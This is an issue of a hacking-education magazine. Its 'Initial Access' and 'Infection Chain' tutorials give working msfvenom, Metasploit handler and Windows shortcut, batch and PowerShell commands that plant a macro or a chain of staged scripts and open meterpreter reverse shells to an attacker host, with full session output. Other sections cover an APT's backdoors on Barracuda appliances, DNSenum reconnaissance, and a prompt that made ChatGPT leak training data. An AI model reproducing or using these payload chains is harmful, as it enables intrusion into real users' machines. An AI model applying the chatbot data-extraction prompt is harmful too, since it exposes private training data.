Hackercool Magazine
Simplifying Cyber Security since 2016
January 2024 | Edition 7 | Issue 1

Learn how Black Hat Hackers hack

INITIAL ACCESS: Creating the malicious PowerPoint (PPT) file used by hacker group TA402.
INFECTION CHAIN: What is an infection chain? With an example.
BYPASSING AV / EDR: How hackers are using GitHub to evade detection of their malicious activity.
HACKSTORY: The story of how Chinese hacker group UNC4841 exploited a zero-day in the Barracuda Email Security Gateway to perform espionage for 8 months.

To advertise with us, contact: admin@hackercoolmagazine.com

Copyright © 2016 - 2024 Hackercool CyberSecurity (OPC) Pvt Ltd. All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed "Attention: Permissions Coordinator," at the address below.

Any references to historical events, real people, or real places are used fictitiously. Names, characters, and places are products of the author's imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd.
Banjara Hills, Hyderabad 50003. Telangana, India.
Website: www.hackercoolmagazine.com
Email Address: admin@hackercoolmagazine.com

Information provided in this Magazine is strictly for educational purposes only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.

"Then you will know the truth and the truth will set you free." - John 8:32

Editor's Note
Edition 7 Issue 1

Hi all. Welcome to the first Issue of Hackercool Magazine for the year 2024.
After completing six editions, I thought it would be a good idea to reboot the content of the Magazine. Although I have been thinking about this for a few months now, I never had a clear picture. Recently, the picture became somewhat clearer and I decided the first Issue of Edition 7 would be a great place to start. As you read this Issue, you will see that it has two new features included and two old features brought back.

The first new feature you will read is "Initial Access". Initial Access, as its name implies, features the file formats and types of vulnerabilities being used by Black Hat Hackers in the real world to gain initial access to a target system or target network. The second new feature introduced with this edition is "Infection Chain". Also called an attack chain or execution chain, the infection chain features all the files, scripts and commands that are executed after the target user clicks on the file sent for gaining initial access, up to the execution of the actual payload on the target system.

I brought back an old feature, "Tool of the Month", with this Edition. For a start, you will see a complete guide to DNSenum in this Issue. Another feature I brought back is Hackstory. If you subscribed to Hackercool Magazine in its starting days, you will be familiar with this feature. No problem though; in the present Issue, enjoy reading the story in which we tell you how a Chinese APT performed cyber espionage for 8 months on organizations by exploiting a vulnerability in Barracuda ESG devices. In Bypassing AV/EDR, we explain to our readers practically how Black Hat Hackers are using GitHub to hide their malicious activity. This is an enjoyable read plus practical, as you will see. I hope you will enjoy it as much as we enjoyed preparing it.
Kalyan Chinta, Founder, Hackercool Magazine

"IT'S POSSIBLE TO SEND MALICIOUS PULL REQUESTS WITH ATTACKER-CONTROLLED DATA FROM THE HUGGING FACE SERVICE TO ANY REPOSITORY ON THE PLATFORM, AS WELL AS HIJACK ANY MODELS THAT ARE SUBMITTED THROUGH THE CONVERSION SERVICE." - HiddenLayer

INSIDE
See what our Hackercool Magazine's January 2024 Issue has in store for you.
1. Initial Access: Creating the malicious PowerPoint file used by hacker group TA402.
2. Hackstory: The story of how the Barracuda ESG appliance got hacked by a Chinese hacker group.
3. Infection Chain: What is an infection chain? Why do hackers use it? With an example.
4. Tool of the Month: DNSenum.
5. Online Security: Cybercriminals are creating their own AI chatbots to support hacking and scam users.
6. Bypassing Antivirus / EDR: How hackers are using GitHub to hide their malicious activity.
Other Useful Resources

INITIAL ACCESS

It's 2024 and we have decided to reboot your Hackercool Magazine. As a part of this reboot, a new feature was given birth to. It is named "Initial Access". In this feature we bring readers knowledge about the files or vectors used by Black Hat Hackers to gain initial access to a target machine or the target network.

Macros have been one of Black Hat Hackers' favorite vectors to gain initial access, at least until Microsoft started blocking macros in files downloaded from the internet by default in 2022. But there are still cases of macros being used by APTs and threat actors around the world, of course with a bit of social engineering. For the first article in the feature "Initial Access", we want to teach our readers how to create PowerPoint macros. PowerPoint macros were detected being used for initial access by hacker group TA402. So, without delay, let's recreate a PowerPoint macro.

As already told, macros were used by hackers around the world to gain initial access. In our previous Issues, readers learnt how to create Word macros and Excel macros.
To a large extent, only these two types of macros were used to gain initial access or install malware by Black Hat hackers around the world. But some hacker groups (like the above-mentioned TA402) used PowerPoint macros too. So, we decided to include PowerPoint macros for our readers.

Macros are Visual Basic for Applications (VBA) code. To create a PowerPoint macro, we need the macro VBA code. As I always say, there are many ways a macro can be created, but I use msfvenom to create it.

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.40.153 lport=446 -f vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 765 bytes

The generated VBA (abridged here; the payload byte array is omitted) declares three kernel32 functions, allocates memory, copies the payload bytes into it and starts a thread on them from an Auto_Open subroutine:

Private Declare PtrSafe Function CreateThread Lib "kernel32" (...) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Blayalrqn As Long, ByVal Meag As Long, ByVal Atpccph As Long, ByVal Xbjbis As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (...) As LongPtr

Sub Auto_Open()
    ' Xzhlnpcdw holds the payload bytes; Uhao is the buffer VirtualAlloc returns
    For Dffwilvrj = LBound(Xzhlnpcdw) To UBound(Xzhlnpcdw)
        ' RtlMoveMemory copies each byte into the buffer
    Next Dffwilvrj
    ' CreateThread starts execution at the buffer
End Sub

This VirtualAlloc / RtlMoveMemory / CreateThread trio is the classic VBA shellcode runner, and it is exactly what antivirus and EDR products look for in a macro, so expect the stock msfvenom output to be detected; the point here is the initial access mechanism, not evasion.

The macro code to get a meterpreter reverse shell is ready. Now, let's create a PowerPoint presentation to add this macro code. For this, I will be using the latest version of the Office suite. I open a new presentation and make some personal changes to it (you can call it self-promotion); the title slide reads "Test for PowerPoint macros - Hackercool Lab". Time to add the macro.
Go to View > Macros. A new window will open; give the macro a name and click on "Create". This opens another window, the Microsoft Visual Basic for Applications editor. Delete whatever code is present in this window, then copy the macro code we just created on our attacker system and paste it here. Hit CTRL+S to save the macro. Then save the presentation as a PowerPoint Macro-Enabled Presentation (*.pptm); here it is saved as "Test for powerpoint macros.pptm".

One thing to keep in mind: unlike Word's AutoOpen, PowerPoint does not run Auto_Open automatically when a .pptm presentation is opened; it runs it for PowerPoint add-ins (.ppam). In a plain .pptm the macro has to be started from the Macros dialog or wired to an action, so do not expect the session just from double-clicking the file.

"The potential benefits of artificial intelligence are huge, so are the dangers." - Dave Waters

On the attacker machine, start a Metasploit listener as shown below:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_http
payload => windows/x64/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.40.153
lhost => 192.168.40.153
msf6 exploit(multi/handler) > set lport 446
lport => 446
msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://192.168.40.153:446

On the target system, open the PowerPoint presentation "Test for powerpoint macros" and let the macro run. The handler reports the stager's request and stages the payload:

[!] http://192.168.40.153:446 handling request from 192.168.40.1; (UUID: salqehrx) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.40.153:446 handling request from 192.168.40.1; (UUID: salqehrx) Staging x64 payload (201820 bytes) ...
[!] http://192.168.40.153:446 handling request from 192.168.40.1; (UUID: salqehrx) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.40.153:446 -> 192.168.40.1:56342) at 2024-02-17 00:32:51 -0500
meterpreter >

Running sysinfo shows the target is Windows 10 (10.0 Build 19045), x64, and getuid shows the session runs as the user who opened the presentation: the macro inherits that user's rights, nothing more.

HACKSTORY
The story of Barracuda ESG appliances getting hacked.

When you are writing a story on hacking, it is necessary that all the actors involved should be introduced first, and an actor can be software as well as a hacker group. So here we go.

What is Barracuda Email Security Gateway (ESG)?
Barracuda Email Security Gateway is an email security appliance used by many companies. Usually, these appliances are placed first in line to receive the organization's incoming mail.

The next character is UNC4841. Usually, threat actors and APTs are named by the security companies that investigate them, in this case Google-owned Mandiant. UNC4841 is the name Mandiant gave to a threat actor belonging to the People's Republic of China (PRC).

What is CVE-2023-2868?
CVE-2023-2868 is a remote code execution vulnerability in the Barracuda Email Security Gateway (ESG) appliance form factor only, in versions 5.1.3.001 to 9.2.0.006. (You can learn more about command injection in our blog post.) This command injection vulnerability can be exploited remotely and is present in the parsing logic for TAR files received as email attachments. The name of a file inside the received archive is not sanitized, and because that name ends up in a system command, a crafted file name is executed as a system command.

Since you are now aware of the characters involved in the story, it's time to start the actual story.

Sometime in the month of October 2022, some of the organizations using Barracuda Email Security Gateway appliances received mail. Some of these emails were sent from spoofed email addresses, some from domains that were not even in use, some from new IP addresses that had not been used in hacking activity until then, and some from organizations with already compromised Barracuda ESG devices. Although they came from different sources, one thing was common in the received emails: all of them contained tar archives as attachments. Some of the attached tar archives were given .jpg and .dat extensions. While four of them were harmless tar archives with nothing but dummy text, the first attachment was designed to exploit the CVE-2023-2868 vulnerability. Since CVE-2023-2868 is the result of a flaw in the parsing of the file name, the content of the tar archives and the files inside rarely mattered; the exploit payload was in the name of the file in the tar archive. Obviously, the exploit payload was an obfuscated command to gain a new shell on the Barracuda appliance with the rights of the appliance itself. This shell was itself a simple shell.

Backdoors
What is a Black Hat hacking attack without installing a backdoor on the compromised device? UNC4841 used wget to download their backdoors to the compromised ESG appliances. The backdoors they used were SEASPY, SEASIDE, SALTWATER and SANDBAR. On some devices these backdoors were downloaded directly, and on others they were downloaded as an archive and extracted on the compromised appliance.

SEASPY is the primary backdoor deployed by UNC4841. It was installed as a PCAP filter on ports TCP/25 and TCP/587, and its code appears similar to that of a publicly available backdoor. SEASPY was installed with the file name "BarracudaMailService".

Another backdoor used by the UNC4841 hacker group was SALTWATER. SALTWATER had functionality to download and upload files, execute commands, and proxy and tunnel traffic. Apart from this, it acts as a module for the Barracuda SMTP daemon. UNC4841 timestomped this backdoor (altered its file timestamps) to avoid detection.

The third backdoor payload, SEASIDE, is a Lua-based module for the Barracuda SMTP daemon that was used to monitor SMTP HELO/EHLO commands, receive an encoded IP address and pass it as an argument to the external binary WHIRLPOOL (to gain a reverse shell).

Apart from these backdoors, UNC4841 also downloaded and installed a rootkit named SANDBAR. It is a trojanized network file system kernel module for Linux, designed to hide specific processes. The code of the SANDBAR rootkit was found to be adapted from another publicly available rootkit on GitHub. The attackers configured SANDBAR to hide processes whose names start with "BAR"; it is very likely they designed it to hide the SEASPY backdoor installed as "BarracudaMailService".

Not just installing external backdoors, UNC4841 also made changes to some of the inbuilt modules of the Barracuda ESG to trojanize them. Altogether they trojanized three Lua modules. One Lua module was modified to register an event handler for incoming email attachments whose name contains a special value. This has been named SEASPRAY. Once SEASPRAY detects the file name it wants, it copies that file to the tmp directory and executes WHIRLPOOL to establish a reverse shell. Another module of the Barracuda ESG that processes emails was trojanized to work as a backdoor named SKIPJACK. It registers a listener for incoming emails' headers and subjects, then decodes and extracts what they carry.

Persistence & Exfiltration
UNC4841 took many steps to stay persistent on the compromised ESG appliances. These include hourly and daily cron jobs, adding a persistent script to /etc/init.d/rc, adding one to the update_version Perl script and deploying the SANDBAR kernel rootkit in such a way that it is executed on startup.

With UNC4841 taking so many measures to maintain persistent access to the ESG appliance, it would be naive to think that they would not use it for exfiltrating data from the target device. On most of the devices compromised by UNC4841, the files to be exfiltrated were saved as tar.gz archives in the /mail/mp directory, to be uploaded to the attacker-controlled server. OpenSSL was used to exfiltrate these tar.gz archives. On some other compromised appliances, they employed a shell script to search for specific emails in "mstore". mstore is where emails received by Barracuda ESG appliances are stored temporarily. These shell scripts were used to search for emails belonging to specific users or email domains and store them in the /mail/lua directory to be exfiltrated. In a few cases, they even employed an anonymous file-sharing service.

Post remediation
It took over six months for Barracuda to detect the exploitation and release a patch for it. Subsequently, they employed the services of Mandiant to investigate the whole hacking incident. As already mentioned above, it was Mandiant that named this hacker group UNC4841. They concluded that it was a Chinese threat actor after the hacking activity decreased during the period that coincided with the beginning of the Chinese New Year, which is observed as a holiday in the People's Republic of China.

After remediation by Barracuda, no new ESG device was compromised, but it seems UNC4841 anticipated the remediation. That's because UNC4841 used different variations of SKIPJACK to keep access to the target appliances, but only on select targets. On some other select targets, Mandiant observed UNC4841 deploying another passive backdoor they named DEPTHCHARGE. Installed through a complex execution chain which involves configuration files, DEPTHCHARGE is packaged as a Linux shared object library that is preloaded into the Barracuda SMTP (BSMTP) daemon. There it listens passively for encrypted commands sent by the hackers, decrypts them using OpenSSL and executes them before sending the results to the Command & Control (C&C) server disguised as SMTP commands.

Another malware family UNC4841 deployed on select targets is FOXTROT/FOXGLOVE. FOXGLOVE is a launcher that executes FOXTROT, which is a C++ backdoor. FOXTROT can capture keystrokes, execute shell commands, start a reverse shell and transfer files. In their entire hacking operation, these two are the only malware that are not specifically built for Barracuda ESG appliances.

Lateral Movement
As soon as Barracuda went public with the vulnerability, Mandiant observed attempts being made by UNC4841 to move laterally. The first evidence was observed on May 10, 2023, when open source tools like fscan were used to perform internal reconnaissance. At the same time, UNC4841 tried to move laterally on the network from impacted ESG appliances using credentials. These credentials were harvested from the contents of messages stolen from the mstore; Mandiant came to this conclusion after finding many cleartext credentials in messages stored on mstore. In another case, UNC4841 gained access to a Windows Server Update Services (WSUS) server using a domain administrator account found in mstore. They also tried to create SSH accounts on compromised ESG devices, which were once again used to maintain access, and tried to move laterally via SSH to VPNs, proxy servers and other edge appliances on the victim's network. In some cases, Mandiant observed that UNC4841 successfully gained access to an account through Outlook Web Access (OWA). Surprisingly, no evidence was found that UNC4841 used such an account to send any emails; their purpose was clearly spying on the inbox.

Targeting
The majority of the targets of UNC4841 appear to be government organizations, another indication that this was a high-level cyber espionage operation. It is absolute irony that appliances designed to protect emails became a source for spying on emails.
But in Black Hat hacking, anything is possible.

INFECTION CHAIN

"Infection Chain" is another new feature added to Hackercool Magazine as part of the REBOOT. You have seen a few infection chains (also known as attack chains) already in our previous Issues, especially in the Issue with a feature on ROKRAT. But that article on different infection chains was so big that no matter how hard we tried to focus on the minute details, it was going to leave some edges uncovered. In the first article of this feature we want our readers to specifically understand what an infection chain is. So, let's start.

What is an infection chain?

In almost all the hacking tutorials on the internet, they create a payload which is most probably an executable, copy it to the target system and click on it to get a session on the attacker system. In Black Hat hacking, though, it's not that simple, although there are rare cases of that too. So, Black Hat hackers use an infection chain which is sometimes very complex and, in many cases, very unique. I am getting a feeling I am going around the bush, so here's the definition.

An infection chain is a set of tools and scripts which are executed in stages, each downloading and executing the next script or tool until the payload is downloaded and installed on the target system. Did I put it in simple terms for you to understand? If the answer is NO, then I think, like everything in Hackercool Magazine, it has to be explained practically. So, let's begin.

We are doing this on a Windows 10 system which already has a meterpreter binary copied to it from the attacker system. Our attacker system, as you might have figured out by now, is Kali Linux with a listener running on it as shown below.

"Humans should be worried about the threat posed by artificial intelligence." - Bill Gates

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.40.153
lhost => 192.168.40.153
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.40.153:4444
[*] Sending stage (200774 bytes) to 192.168.40.150
[*] Meterpreter session 1 opened (192.168.40.153:4444 -> 192.168.40.150:50477) at 2024-02-19 05:07:06 -0500
meterpreter >

With a shortcut file "malicious.lnk" whose target field directly executes the meterpreter payload, clicking the shortcut gives the session shown above. Now, you have successfully created your first infection chain, although at present it is looking more like an itty-bitty link than any infection chain. Let's add another element in the middle, between the LNK file and the payload. Hmm, what should I add here? How about a PowerShell script?

LNK -> PowerShell script -> meterpreter payload.exe

I named the PowerShell script "malicious_a.ps1" and it contains the following script. If you are new to PowerShell, this script executes a Windows executable from the current working directory.

Start-Process met_x64_153_4444.exe

Both files sit in the user's Temp folder (%temp%): malicious_a.ps1 and met_x64_153_4444.exe.

Now, I change the "malicious.lnk" target field to execute this PowerShell script instead of directly executing the payload. Here's the code.

cmd.exe /c "powershell.exe %temp%\malicious_a.ps1"

In the shortcut's properties this shows up as Target type: Application, Target location: System32, Target: C:\Windows\System32\cmd.exe /c "powershell.exe %temp%\malicious_a.ps1", and the "Start in" field is set to "C:\Program Files\Mozilla Firefox".

Once again, when you click on the "malicious.lnk" file, you should get a meterpreter session:

[*] Started reverse TCP handler on 192.168.40.153:4444
[*] Sending stage (200774 bytes) to 192.168.40.150
[*] Meterpreter session 16 opened (192.168.40.153:4444 -> 192.168.40.150:...)

To further lengthen the infection chain, I will add a Batch script now.

LNK -> Batch file -> PowerShell script -> meterpreter payload.exe

Here's the Batch script, "malicious_b.bat":

powershell.exe -ExecutionPolicy Bypass -File malicious_a.ps1
pause

(Except for the "pause" command, which I added while checking the infection chain and forgot to remove.) As you might have understood by now, when we click on the "malicious.lnk" shortcut, the Batch file will be executed, which in turn executes the PowerShell script, and that in turn executes the final payload. So, I change the target field of "malicious.lnk" accordingly.

cmd.exe /c start %temp%\malicious_b.bat

(Target: C:\Windows\System32\cmd.exe /c start %temp%\malicious_b.bat; Start in: "C:\Program Files\Mozilla Firefox"; Run: Normal window.)

I hope you are getting this. It's not that difficult, just a bit delicate and confusing. Get the fine details once and you should be good. Now, the final piece of the puzzle: I will be adding a CMD file to the infection chain.

LNK -> CMD file -> Batch file -> PowerShell script -> meterpreter payload.exe

Here's the CMD file, "malicious_c.cmd":

start %temp%\malicious_b.bat

Here are all the files in one place, in the Temp folder: malicious_a.ps1, malicious_b.bat, malicious_c.cmd, malicious.lnk and met_x64_153_4444.exe.

"Artificial intelligence is just a new tool, one that can be used for good and for bad purposes and one that comes with new dangers and downsides as well. We know already that although machine learning has huge potential, data sets with ingrained biases will produce biased results - garbage in, garbage out." - Sarah Jeong

The shortcut's target is changed one last time to cmd.exe /c start %temp%\malicious_c.cmd (Start in: "C:\Program Files\Mozilla Firefox"; Run: Normal window). Once again, whenever the shortcut file is clicked, we will have a meterpreter session on the attacker system.

[*] Started reverse TCP handler on 192.168.40.153:4444
[*] Sending stage (200774 bytes) to 192.168.40.150
[*] Meterpreter session 23 opened (192.168.40.153:4444 -> 192.168.40.150:50567) at 2024-02-20 08:48:13 -0500
meterpreter >

That's it. You have successfully created an infection chain just like a Black Hat hacker. But there's one big question still unanswered.

Why do hackers use an infection chain?

In the infection chain we created above, have you noticed something? From the first step of clicking on the LNK file to the step before the payload is executed, we are not performing any malicious actions on the system at all, just execution of some commands and scripts which are considered LEGITIMATE. This multi-stage infection improves the chances of a hacker infecting your system more than sending the payload itself. Every stage is a hand-off between signed Windows binaries (cmd.exe, powershell.exe), so a defender has to look at the shortcut's target and at the parent-child process chain rather than at any single file to see what is going on.
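As an added example (not the magazine's own code), here is a Python script that does what a defender does with such a chain: it parses the target, "Start in" directory and arguments out of a shortcut file and then walks the stage files cmd -> bat -> ps1 -> exe by reading them, never by running them. The shortcut and the stage files are constructed inside the script as stand-ins for the ones above; the .exe is a stub, not a payload, and the shortcut carries only the header and string fields of the MS-SHLLINK format (no IDList), so it is built for parsing, not for double-clicking. The triage heuristics in shortcut_findings are my own, not anything the article or Windows defines.

```python
"""Static reconstruction of a LNK-led infection chain (added example)."""
import pathlib
import re
import struct
import tempfile

# LinkFlags bits from the MS-SHLLINK specification
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HEADER_SIZE = 0x4C

# Script hosts are hand-offs between stages, not stages themselves
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
STAGE_RE = re.compile(r"([\w.\-]+\.(?:cmd|bat|ps1|vbs|js|exe))", re.IGNORECASE)


def _string_data(text):
    """StringData item: CountCharacters, then UTF-16LE text with no terminator."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, working_dir, arguments):
    """Minimal shell link (header + StringData), constructed for the parser."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = 1
    return (header + _string_data(relative_path) + _string_data(working_dir)
            + _string_data(arguments))


def parse_lnk(blob):
    """Return the StringData fields (target path, Start in, arguments, ...)."""
    size, clsid, flags = struct.unpack_from("<I16sI", blob, 0)
    if size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", blob, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = blob[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields


def next_stage(command):
    """First script or binary a command line hands off to, skipping LOLBins."""
    for match in STAGE_RE.finditer(command):
        if match.group(1).lower() not in INTERPRETERS:
            return match.group(1)
    return None


def follow_chain(first_command, stage_dir, max_depth=8):
    """Walk the stages by reading each file, never by executing it."""
    chain, command = [], first_command
    for _ in range(max_depth):
        name = next_stage(command)
        if name is None:
            break
        chain.append(name)
        path = stage_dir / name
        if name.lower().endswith(".exe") or not path.is_file():
            break                          # final payload, or a stage we lack
        command = path.read_text(errors="replace")
    return chain


def shortcut_findings(fields):
    """Cheap triage signals that need no chain walk at all (own heuristics)."""
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    work = fields.get("working_dir", "")
    findings = []
    if "cmd.exe" in target or "powershell.exe" in target:
        findings.append("target is a script host rather than a document or program")
    if "%temp%" in target or "%appdata%" in target:
        findings.append("arguments point into a user-writable profile directory")
    if work and pathlib.PureWindowsPath(work).name.lower() not in target:
        findings.append("Start in directory is unrelated to the target (disguise)")
    return findings


def demo(stage_dir=None):
    """Write constructed stage files, build the shortcut, reconstruct the chain."""
    if stage_dir is None:
        with tempfile.TemporaryDirectory() as tmp:
            return demo(pathlib.Path(tmp))
    # Constructed stand-ins for the article's stage files; the .exe is a stub.
    (stage_dir / "malicious_c.cmd").write_text("start %temp%\\malicious_b.bat\n")
    (stage_dir / "malicious_b.bat").write_text(
        "powershell.exe -ExecutionPolicy Bypass -File malicious_a.ps1\npause\n")
    (stage_dir / "malicious_a.ps1").write_text("Start-Process met_x64_153_4444.exe\n")
    (stage_dir / "met_x64_153_4444.exe").write_bytes(b"stub, not a payload")
    lnk = build_lnk(r"..\..\Windows\System32\cmd.exe",
                    r"C:\Program Files\Mozilla Firefox",
                    r"/c start %temp%\malicious_c.cmd")
    fields = parse_lnk(lnk)
    chain = ["malicious.lnk"] + follow_chain(fields["arguments"], stage_dir)
    return fields, chain, shortcut_findings(fields)


if __name__ == "__main__":
    fields, chain, findings = demo()
    print(" -> ".join(chain))
    for finding in findings:
        print("finding:", finding)
```

Run as a script it prints the five-link chain and three findings for the constructed shortcut, and nothing for a shortcut whose "Start in" folder actually contains its target. The same parse_lnk and follow_chain work on a real .lnk read from disk; the walk stops at the first stage that is not present, which is exactly where a downloader stage would fetch the next file from the network.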
TOOL OF THE MONTH

DNSenum is a multithreaded Perl script that is used to gather information from target DNS servers. The features of DNSenum are:
1. Get the host's address (A record).
2. Get the nameservers (NS).
3. Get the MX record (MX).
4. Perform AXFR queries on nameservers and get BIND VERSION.
5. Get extra names and subdomains via Google scraping (google query = "allinurl: -www site:domain").
6. Brute force subdomains from a file; it can also perform recursion on subdomains that have NS records.
7. Calculate C class domain network ranges and perform whois queries on them.
8. Perform reverse lookups on netranges (C class or/and whois netranges).

Let's see how to perform DNS enumeration with DNSenum. DNSenum is included by default in Kali Linux. If you want to enumerate a domain with DNSenum, all you have to do is supply a domain name as shown below.

dnsenum acme.com

When run in default mode, DNSenum first enumerates the host address, then the name servers, then MX records, AXFR queries, extra names and subdomains via Google scraping, brute forces subdomains from the wordlist, calculates the class C IP network ranges from the results, performs whois queries on them and performs reverse lookups on these IP addresses.

In this run (dnsenum VERSION:1.2.6) the host's address was listed, the name servers came back as dns1 to dns5.name-services.com, and each zone transfer attempt ended with "AXFR record query failed: REFUSED". A refused AXFR is the expected answer from a properly configured name server; only a misconfigured one hands over the whole zone in one query.

"If you're not concerned about AI safety you should be. Vastly more risk than North Korea." - Elon Musk
"Deepfakes and misinformation are just two of the ways AI could have major negative impact on fake news." - Dave Waters

--dnsserver
In some cases, the result of the enumeration can vary depending on the server that is queried. DNSenum can send its queries to another DNS server with the --dnsserver <server> option. Note that in the run shown here the option was typed as --dns-server, and dnsenum 1.2.6 replied "Unknown option: dns-server"; the option name has no hyphen.

dnsenum acme.com --dnsserver <server>

"The consequences of AI going wrong are severe so we have to be proactive rather than reactive." - Elon Musk

--file (-f)
When you use DNSenum on a domain, you will notice a delay, because the wordlist DNSenum uses for subdomain brute forcing ("/usr/share/dnsenum/dns.txt") has over 1500 entries, and until the tool has checked all of them there will definitely be a wait. Can we reduce this delay? Yes, by using another file instead of the default one. For example, we can create our own "dns.txt" file with entries of the subdomains we care about and specify it with the (-f) option as shown below.

dnsenum acme.com -f dns.txt

--subfile
We can also save the output of subdomain brute forcing in a file using the --subfile option:

dnsenum acme.com -f dns.txt --subfile subdomains.txt

--noreverse
Coming to reverse lookups, performing a reverse lookup on 512 IP addresses (in this case) definitely takes time. But don't worry. We can skip the reverse lookup with the --noreverse option:

dnsenum acme.com -f dns.txt --noreverse

--private
This option enumerates and saves the private IP addresses of a domain in a file named <domain_name>_ips.txt (here acme.com_ips.txt):

dnsenum acme.com -f dns.txt --private

--timeout (-t)
The default timeout of TCP and UDP queries in dnsenum is 10 seconds. The timeout option allows us to change it:

dnsenum acme.com -f dns.txt --timeout <seconds>

--threads
This option specifies the number of threads that perform the different queries:

dnsenum acme.com -f dns.txt --threads <value>

--verbose (-v)
You already know what this option does. It reveals more information. See the differences.
dnsenum acme.com -f dns.txt -v

--scrape (-s)
This option specifies the number of subdomains to be scraped from Google.

dnsenum acme.com -f dns.txt -s <number>

--page (-p)
While scraping subdomains with dnsenum above, you should have noticed that it queries Google search pages for subdomains related to the domain. By default, it is 20 pages. Using this option, it can be changed. For example, let's set it to 10.

dnsenum acme.com -f dns.txt -p 10

--recursion (-r)
This option can be used to perform recursion on subdomain gathering.

dnsenum acme.com -f dns.txt -r

--whois (-w)
As you might have expected, this option is used to perform whois queries on class C network ranges. It can be time consuming. Use wisely.

dnsenum acme.com -f dns.txt -w

--delay (-d)
This option is used to specify the maximum delay between each whois query. The default delay is 3 seconds.

dnsenum acme.com -f dns.txt -w -d 10

ONLINE SECURITY

Artificial intelligence (AI) tools aimed at the general public, such as ChatGPT, Bard, CoPilot and DallE, have incredible potential to be used for good. The benefits range from an enhanced ability by doctors to diagnose disease, to expanding access to professional and academic expertise. But those with criminal intentions could also exploit and subvert these technologies, posing a threat to ordinary citizens. Criminals are even creating their own AI chatbots to support hacking and scams. The US CISA security agency has also warned about generative AI's potential effect on the upcoming US presidential elections.

AI's potential for wide-ranging risks and threats is underlined by the publication of the UK government's Generative AI Framework and the National Cyber Security Centre's guidance on the potential impacts of AI on online threats. There are an increasing variety of ways that generative AI systems like ChatGPT and Dall-E can be used by criminals. Because of ChatGPT's ability to create tailored content based on a few simple prompts, one potential way it could be exploited by criminals is in crafting convincing scams and phishing messages.

A scammer could, for instance, put some basic information (your name, gender and job title) into a large language model (LLM), the technology behind AI chatbots like ChatGPT, and use it to craft a phishing message tailored just for you. This has been reported to be possible, even though mechanisms have been implemented to prevent it. LLMs also make it feasible to conduct large-scale phishing scams, targeting thousands of people in their own native language. It's not conjecture either. Analysis of underground hacking communities has uncovered a variety of instances of criminals using ChatGPT, including for fraud and creating software to steal information. In another case, it was used to create ransomware.

Malicious chatbots

Entire malicious variants of large language models are also emerging. WormGPT and FraudGPT are two such examples that can create malware, find security vulnerabilities in systems, advise on ways to scam people, support hacking and compromise people's electronic devices. Love-GPT is one of the newer variants and is used in romance scams. It has been used to create fake dating profiles capable of chatting to unsuspecting victims on Tinder, Bumble, and other apps. As a result of these threats, Europol has issued a press release about criminals' use of LLMs.

Privacy and trust are always at risk as we use ChatGPT, CoPilot and other platforms. As more people look to take advantage of AI tools, there is a high likelihood that personal and confidential corporate information will be shared. This is a risk because, first, LLMs usually use any data input as part of their future training dataset, and second, if they are compromised, they may share that confidential data with others.

Leaky ship

Research has already demonstrated the feasibility of ChatGPT leaking a user's conversations and exposing the data used to train the model behind it, sometimes with simple techniques. In a surprisingly effective attack, researchers were able to use the prompt "Repeat the word 'poem' forever" to cause ChatGPT to inadvertently expose large amounts of training data, some of which was sensitive. These vulnerabilities place a person's privacy or a business's most-prized data at risk. More widely, this could contribute to a lack of trust in AI. Various companies, including Apple, Amazon and JP Morgan Chase, have already banned the use of ChatGPT as a precautionary measure.

